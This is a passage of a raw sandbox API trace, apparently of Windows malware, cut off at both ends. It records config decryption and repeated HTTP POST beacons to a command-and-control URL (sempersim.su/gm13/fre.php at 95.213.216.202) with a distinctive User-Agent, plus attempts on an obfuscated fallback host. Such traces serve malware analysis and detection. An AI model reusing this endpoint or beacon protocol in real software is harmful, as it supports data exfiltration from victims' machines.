0x77420000 [0281.465] CryptDecrypt (in: hKey=0x62d7d0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643488, pdwDataLen=0x19fcfc | out: pbData=0x643488, pdwDataLen=0x19fcfc) returned 1 [0281.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.466] CryptDestroyKey (hKey=0x62d7d0) returned 1 [0281.466] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0281.467] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0281.467] GetProcessHeap () returned 0x620000 [0281.467] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645a80 [0281.467] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0281.467] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0281.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0281.468] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0281.469] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0281.469] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0281.469] GetProcessHeap () returned 0x620000 [0281.469] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0281.469] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c168*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0281.470] GetProcessHeap () returned 0x620000 [0281.470] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b590 [0281.470] socket (af=2, type=1, protocol=6) returned 0x41c [0281.471] connect (s=0x41c, name=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0281.527] FreeAddrInfoW (pAddrInfo=0x63c168*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb50*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0281.527] GetProcessHeap () returned 0x620000 [0281.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba08 [0281.527] GetProcessHeap () returned 0x620000 [0281.527] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0281.528] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0281.530] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0281.530] GetProcessHeap () returned 0x620000 [0281.530] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0281.530] GetProcessHeap () returned 0x620000 [0281.531] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0281.531] GetProcessHeap () returned 0x620000 [0281.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6430e0 [0281.531] GetProcessHeap () returned 0x620000 [0281.531] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0281.533] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0281.535] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0281.535] GetProcessHeap () returned 0x620000 [0281.535] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0281.535] GetProcessHeap () returned 0x620000 [0281.536] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0281.536] send (s=0x41c, buf=0x63a880*, len=237, flags=0) returned 237 [0281.543] send (s=0x41c, buf=0x6421e0*, len=159, flags=0) returned 159 [0281.543] GetProcessHeap () returned 0x620000 [0281.543] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0281.543] recv (in: s=0x41c, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0283.163] GetProcessHeap () returned 0x620000 [0283.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0283.164] GetProcessHeap () returned 0x620000 [0283.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6430e0 | out: hHeap=0x620000) returned 1 [0283.164] GetProcessHeap () returned 0x620000 [0283.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0283.165] GetProcessHeap () returned 0x620000 [0283.165] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba08 | out: hHeap=0x620000) returned 1 [0283.165] closesocket (s=0x41c) returned 0 [0283.166] GetProcessHeap () returned 0x620000 [0283.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b590 | out: hHeap=0x620000) returned 1 [0283.166] GetProcessHeap () returned 0x620000 [0283.166] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645a80 | out: hHeap=0x620000) returned 1 [0283.167] GetProcessHeap () returned 0x620000 [0283.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0283.168] GetProcessHeap () returned 0x620000 [0283.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0283.168] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc90) returned 0x41c [0283.171] Sleep (dwMilliseconds=0xea60) [0283.185] GetProcessHeap () returned 0x620000 [0283.185] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642d80 [0283.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.186] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.209] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0283.217] GetProcessHeap () returned 0x620000 [0283.217] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0283.218] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.218] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0283.219] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.219] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.220] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.220] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.220] GetProcessHeap () returned 0x620000 [0283.221] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0283.222] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.223] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642d80, pdwDataLen=0x19fcfc | out: pbData=0x642d80, pdwDataLen=0x19fcfc) returned 1 [0283.223] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.224] CryptDestroyKey (hKey=0x62d710) returned 1 [0283.224] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.225] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0283.225] GetProcessHeap () returned 0x620000 [0283.225] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645ca8 [0283.225] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0283.226] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.229] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0283.237] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.237] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0283.238] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.238] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0283.239] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.239] GetProcessHeap () returned 0x620000 [0283.239] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0283.239] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.239] GetProcessHeap () returned 0x620000 [0283.242] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0283.242] GetProcessHeap () returned 0x620000 [0283.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645ca8 | out: hHeap=0x620000) returned 1 [0283.243] GetProcessHeap () returned 0x620000 [0283.243] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642d80 | out: hHeap=0x620000) returned 1 [0283.243] GetProcessHeap () returned 0x620000 [0283.243] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642e58 [0283.244] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.244] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.259] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.260] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba90) returned 1 [0283.345] GetProcessHeap () returned 0x620000 [0283.345] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0283.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.347] CryptImportKey (in: hProv=0x63ba90, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0283.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.348] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.349] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.349] GetProcessHeap () returned 0x620000 [0283.349] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0283.350] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.351] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642e58, pdwDataLen=0x19fcfc | out: pbData=0x642e58, pdwDataLen=0x19fcfc) returned 1 [0283.351] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.352] CryptDestroyKey (hKey=0x62d710) returned 1 [0283.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0283.353] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0283.353] GetProcessHeap () returned 0x620000 [0283.353] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645630 [0283.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0283.513] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0283.513] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0283.514] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0283.514] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0283.515] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0283.515] GetProcessHeap () returned 0x620000 [0283.515] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0283.515] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c1b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0283.516] GetProcessHeap () returned 0x620000 [0283.516] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b5c0 [0283.517] socket (af=2, type=1, protocol=6) returned 0x420 [0283.517] connect (s=0x420, name=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0283.572] FreeAddrInfoW (pAddrInfo=0x63c1b8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63eb80*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0283.572] GetProcessHeap () returned 0x620000 [0283.572] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0283.572] GetProcessHeap () returned 0x620000 [0283.573] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0283.574] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0283.575] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0283.575] GetProcessHeap () returned 0x620000 [0283.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0283.575] GetProcessHeap () returned 0x620000 [0283.575] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0283.575] GetProcessHeap () returned 0x620000 [0283.575] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x6435f0 [0283.576] GetProcessHeap () returned 0x620000 [0283.576] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0283.576] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0283.577] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0283.577] GetProcessHeap () returned 0x620000 [0283.577] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0283.577] GetProcessHeap () returned 0x620000 [0283.578] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0283.578] send (s=0x420, buf=0x63a880*, len=237, flags=0) returned 237 [0283.578] send (s=0x420, buf=0x6421e0*, len=159, flags=0) returned 159 [0283.579] GetProcessHeap () returned 0x620000 [0283.579] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0283.579] recv (in: s=0x420, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0285.264] GetProcessHeap () returned 0x620000 [0285.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0285.265] GetProcessHeap () returned 0x620000 [0285.265] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6435f0 | out: hHeap=0x620000) returned 1 [0285.265] GetProcessHeap () returned 0x620000 [0285.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0285.266] GetProcessHeap () returned 0x620000 [0285.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0285.266] closesocket (s=0x420) returned 0 [0285.266] GetProcessHeap () returned 0x620000 [0285.266] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b5c0 | out: hHeap=0x620000) returned 1 [0285.267] GetProcessHeap () returned 0x620000 [0285.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645630 | out: hHeap=0x620000) returned 1 [0285.267] GetProcessHeap () returned 0x620000 [0285.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642e58 | out: hHeap=0x620000) returned 1 [0285.267] GetProcessHeap () returned 0x620000 [0285.267] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0285.268] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xc94) returned 0x420 [0285.269] Sleep (dwMilliseconds=0xea60) [0285.280] GetProcessHeap () returned 0x620000 [0285.280] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643170 [0285.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.281] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.289] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0285.301] GetProcessHeap () returned 0x620000 [0285.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0285.302] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.302] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0285.303] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.303] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.304] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.304] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.304] GetProcessHeap () returned 0x620000 [0285.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0285.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.306] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643170, pdwDataLen=0x19fcfc | out: pbData=0x643170, pdwDataLen=0x19fcfc) returned 1 [0285.306] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.307] CryptDestroyKey (hKey=0x62d710) returned 1 [0285.310] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.310] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0285.310] GetProcessHeap () returned 0x620000 [0285.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0285.311] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0285.311] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0285.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0285.312] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0285.313] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0285.313] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0285.314] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0285.314] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.314] GetProcessHeap () returned 0x620000 [0285.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0285.314] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.315] GetProcessHeap () returned 0x620000 [0285.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0285.316] GetProcessHeap () returned 0x620000 [0285.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0285.317] GetProcessHeap () returned 0x620000 [0285.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643170 | out: hHeap=0x620000) returned 1 [0285.317] GetProcessHeap () returned 0x620000 [0285.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643248 [0285.318] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.318] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.352] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.352] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0285.360] GetProcessHeap () returned 0x620000 [0285.360] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0285.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.361] CryptImportKey (in: hProv=0x63b7e8, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0285.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.362] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.362] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.362] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.362] GetProcessHeap () returned 0x620000 [0285.363] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0285.363] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.364] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643248, pdwDataLen=0x19fcfc | out: pbData=0x643248, pdwDataLen=0x19fcfc) returned 1 [0285.364] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.364] CryptDestroyKey (hKey=0x62d190) returned 1 [0285.365] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0285.365] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0285.365] GetProcessHeap () returned 0x620000 [0285.365] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646320 [0285.366] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0285.366] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0285.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0285.367] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0285.367] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0285.368] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0285.368] GetProcessHeap () returned 0x620000 [0285.368] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0285.368] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c320*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ecb8*(sa_family=2, 